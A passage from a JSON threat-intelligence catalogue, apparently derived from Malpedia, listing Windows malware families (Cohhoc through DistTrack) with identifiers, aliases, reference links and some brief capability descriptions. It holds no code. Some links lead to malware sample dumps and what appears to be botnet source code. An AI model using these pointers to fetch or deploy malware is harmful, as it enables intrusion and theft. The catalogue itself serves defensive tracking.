"https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" ], "synonyms": 
[], "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", "value": "Cohhoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", "https://secrary.com/ReversingMalware/CoinMiner/" ], "synonyms": [], "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", "value": "Coinminer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" ], "synonyms": [ "Bandios", "GrayBird" ], "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", "value": "Colony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" ], "synonyms": [], "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", "value": "Combojack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", "value": "Combos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" ], "synonyms": [], "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", "value": "ComodoSec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", 
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research" ], "synonyms": [ "lojack" ], "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", "value": "Computrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" ], "synonyms": [], "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", "value": "ComradeCircle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", "value": "concealment_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ "downadup", "traffic converter" ], "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", "value": "Conficker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", 
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", "value": "Confucius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", "value": "Contopee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", "value": "CookieBag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" ], "synonyms": [], "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", "http://malware.prevenity.com/2014/08/malware-info.html" ], "synonyms": [], "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", "value": "Coreshell" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" ], "synonyms": [], "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", "value": "CradleCore" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ "Crash", "Industroyer" ], "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", "value": "Credraptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" ], "synonyms": [], "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", "value": "Crenufs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", "value": "Crimson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", 
"https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", "value": "Crisis (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", "https://twitter.com/demonslay335/status/971164798376468481", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", "value": "Cryakl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" ], "synonyms": [], "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", "value": "CryLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", "value": "CrypMic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" ], "synonyms": [], "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", "value": "Crypt0l0cker" }, { "description": "CryptoLocker is a new, sophisticated malware that was launched in late 2013. It is designed to attack the Windows operating system by encrypting all the files on the system using an RSA-2048 public key. 
To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.secureworks.com/research/cryptolocker-ransomware" ], "synonyms": [], "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", "value": "CryptoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" ], "synonyms": [], "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", "value": "CryptoLuck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" ], "synonyms": [ "CryptFile2" ], "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", "value": "CryptoMix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", "https://twitter.com/struppigel/status/810770490491043840" ], "synonyms": [], "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", "value": "Cryptorium" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", "value": "CryptoShield" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" ], "synonyms": [], "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", "value": "CryptoShuffler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" ], "synonyms": [], "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", "value": "Cryptowall" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" ], "synonyms": [], "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", "value": "CryptoWire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", "value": "CryptoFortress" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" ], "synonyms": [], "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", "value": "CryptoRansomeware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", "value": "CryptXXXX" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", "value": "CsExt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" ], "synonyms": [ "Windshield?" ], "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", "value": "Cuegoe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" ], "synonyms": [], "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" ], "synonyms": [], "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", "value": "Cutlet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" ], "synonyms": [], "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", "value": "Cutwail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "Rebhip" ], "type": [] }, "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", "value": "CyberGate" }, { "description": "", "meta": { 
"refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" ], "synonyms": [], "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", "value": "CyberSplitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" ], "synonyms": [], "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", "value": "CycBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", "value": "Dairy" }, { "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" ], "synonyms": [], "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", "value": "DanaBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://darkcomet.net", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" ], "synonyms": [ "Fynloski", "klovbot" ], "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", "value": "DarkComet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html" ], "synonyms": [], "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", "value": "DarkMegi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" ], "synonyms": [ "Chymine" ], "type": [] }, "uuid": 
"81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", "value": "Darkmoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", "value": "DarkPulsar" }, { "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" ], "synonyms": [], "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", "value": "DarkShell" }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. 
The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://blog.radware.com/security/2018/02/darksky-botnet/", "https://github.com/ims0rry/DarkSky-botnet" ], "synonyms": [], "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", "value": "Darksky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" ], "synonyms": [], "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", "value": "DarkStRat" }, { "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" ], "synonyms": [], "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", "value": "DarkTequila" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" ], "synonyms": [], "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", "value": "Darktrack RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", 
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" ], "synonyms": [ "Muirim", "Nioupale" ], "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", "value": "Daserf" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" ], "synonyms": [], "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", "value": "Datper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" ], "synonyms": [], "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" ], "synonyms": 
[], "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" ], "synonyms": [], "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", "value": "Dented" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "synonyms": [], "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", "value": "DeputyDog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" ], "synonyms": [], "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", "value": "DeriaLock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], "synonyms": [], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", "value": "Derusbi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" ], "synonyms": [], "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", "value": "Devil's Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", 
"https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" ], "synonyms": [ "LusyPOS" ], "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", "value": "Dexter" }, { "description": "According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.\r\n\r\nOnce they gain access to the computer they will install the ransomware and let it encrypt the computer. 
If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" ], "synonyms": [ "Arena", "Crysis" ], "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", "value": "Dharma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://www.scmagazine.com/inside-diamondfox/article/578478/", "https://blog.cylance.com/a-study-in-bots-diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" ], "synonyms": [ "Crystal", "Gorynch", "Gorynych" ], "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" ], "synonyms": [], "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", "value": "Dimnie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" ], "synonyms": [], "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", 
